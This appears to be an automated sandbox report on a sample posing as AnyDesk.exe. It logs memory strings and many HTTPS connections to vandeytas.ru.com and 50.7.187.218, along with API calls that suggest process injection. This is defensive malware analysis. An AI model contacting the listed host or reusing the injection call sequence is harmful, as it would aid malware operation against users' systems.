      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:54 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:56 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: AnyDesk.exe, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3383259657.000000007F9FF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368038850.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120469469.0000000002872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
      Source: AnyDesk.exe, 00000000.00000002.3366823048.000000000063C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2517737691.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.000000000063E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2668808919.0000000000642000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2256562401.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2343804811.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2188445742.0000000000646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/
      Source: AnyDesk.exe, 00000000.00000002.3382171324.000000002090D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlv
      Source: AnyDesk.exe, 00000000.00000002.3382171324.0000000020923000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2343804811.000000000064B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinff
      Source: AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinff0
      Source: AnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2495985049.0000000000642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffL
      Source: AnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffLL
      Source: AnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffT
      Source: AnyDesk.exe, 00000000.00000003.2344442230.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.00000000005F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffX
      Source: AnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.000000000063C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.000000000063E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2668808919.0000000000642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinffg
      Source: AnyDesk.exe, 00000000.00000003.2734850198.0000000000649000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2188445742.000000000063C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinffi
      Source: AnyDesk.exe, 00000000.00000003.2343804811.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/D
      Source: AnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/d
      Source: AnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com/l
      Source: AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2734850198.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vandeytas.ru.com:443/233_Hlvzmhuinff
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49792 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49799 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49806 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49819 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49826 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49833 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49839 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49852 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49867 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49874 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49880 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49887 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49901 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49908 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49915 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49922 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49929 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49936 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49943 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49950 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49957 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49964 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49971 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49986 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50000 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50007 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50033 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50040 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50047 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50054 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50061 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50065 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50072 version: TLS 1.2
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02B3DD70
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B37D78 NtWriteVirtualMemory,0_2_02B37D78
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B3DBB0
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02B3DC8C
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B3DC04
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B38D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02B38D70
